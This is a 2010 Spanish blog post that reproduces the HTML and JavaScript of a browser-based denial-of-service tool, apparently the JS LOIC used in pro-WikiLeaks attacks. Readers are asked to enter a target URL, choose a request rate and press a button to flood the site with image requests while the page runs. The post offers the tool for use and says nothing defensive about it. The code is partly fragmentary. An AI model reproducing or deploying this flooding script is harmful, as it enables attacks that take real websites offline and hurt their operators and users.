viernes, 10 de diciembre de 2010

Código para ciberataques




<h2 style="font-size:15px;color:#1177CC;">
No necesitas descargar, instalar o configurar absolutamente nada. Tan solo pulsa el botón azul, sientate y disfruta del espectáculo.
<h2 style="font-size:15px;">
No need to download, install or setup anything - just click the button, sit and enjoy the show.</h2>
<div style="width:100%; height:100%;">
<div style="width:240px; height:100px;">
<fieldset style="width:100%; height:100%;">
<legend>Paso 1. Selecciona el objetivo:</legend>
<input id="targetURL" style="width:100%;" value="" /></label>
<small>Para ver el objetivo actual entra en: <a href="" style="color:#FFF;"></a></small>


<div style="width:240px; height:100px;">
<fieldset style="width:100%; height:100%;">

<legend>Pasop 2. ¿Preparado?</legend>
<button id="fireButton" style="background-color:#336494; border-color:#FFF; color:#FFF; width:240px; height:70px; margin-top:-22px;">Empezar Ataque</button>

<div style="width:240px; height:160px;">
<fieldset style="width:100%; height:100%;">
<legend>Optional. Options</legend>

<label>Respuestas por Segundo: <input style="width:40px;" id="rps" value="10" /></label>

<label>Añade un Mensaje:
<input style="width:100%;" id="message" value="" /></label>

<div style="width:240px; height:160px;">
<fieldset style="width:100%; height:100%;">
<legend>Estado del Ataque:</legend>
<dd id="requestedCtr">0</dd>
<dt style="opacity: 0.5">Realizadas con éxito:</dt>
<dd style="opacity: 0.5" id="succeededCtr">0</dd>
<dt style="opacity: 0.5">Fallidas:</dt>
<dd style="opacity: 0.5" id="failedCtr">0</dd>          </dl>

<div style="font-size:14px;">
We need your help in support of <a href="" style="color:#1177CC;">wikileaks</a> leave this page firing as long as you can.  Don't worry if requests show as failed.

<div style="font-size:14px;">
Necesitamos tu ayuda para poder dar soporte a <a href="" style="color:#1177CC;">wikileaks</a> deja que la página se lance todo el tiempo que puedas.  No te preocupes si las respuestas aparecen como fallidas.

Vía <a href="" style="color:#1177CC;"></a>
        (function () {

            var fireInterval;
            var isFiring = false;

            var requestedCtrNode = document.getElementById("requestedCtr"),
                succeededCtrNode = document.getElementById("succeededCtr"),
                failedCtrNode = document.getElementById("failedCtr"),
                targetURLNode = document.getElementById("targetURL"),
                fireButton = document.getElementById("fireButton"),
                messageNode = document.getElementById("message"),
                rpsNode = document.getElementById("rps"),
                timeoutNode = document.getElementById("timeout");

            var targetURL = targetURLNode.value;
            targetURLNode.onchange = function () {
                targetURL = this.value;

            var requestsHT = {}; // requests hash table, may come in handy later

            var requestedCtr = 0,
                succeededCtr = 0,
                failedCtr = 0;

            var makeHttpRequest = function () {
     if (requestedCtr > failedCtr + succeededCtr + 1000) { //Allow no more than 1000 hung requests
                    var rID =Number(new Date());
                    var img = new Image();
                    img.onerror = function () { onFail(rID); };
                    img.onabort = function () { onFail(rID); };
                    img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods
     img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
                    requestsHT[rID] = img;

            var onRequest = function (rID) {
                    requestedCtrNode.innerHTML = requestedCtr;

            var onComplete = function (rID) {
                    delete requestsHT[rID];

            var onFail = function (rID) {
                   // failedCtr++;
                    //failedCtrNode.innerHTML = failedCtr;
     succeededCtr++; //Seems like the url will always fail it it isn't an image
                    succeededCtrNode.innerHTML = succeededCtr;

                    delete requestsHT[rID]; // we can't keep it forever or it would blow up the browser

            var onSuccess = function (rID) {
                    succeededCtrNode.innerHTML = succeededCtr;
                    delete requestsHT[rID];

            fireButton.onclick = function () {
                if (isFiring) {

                    isFiring = false;
                    this.innerHTML = "IMMA CHARGING MAH LAZER";
                } else {
                    isFiring = true;
                    this.innerHTML = "Stop flooding";

                    fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));


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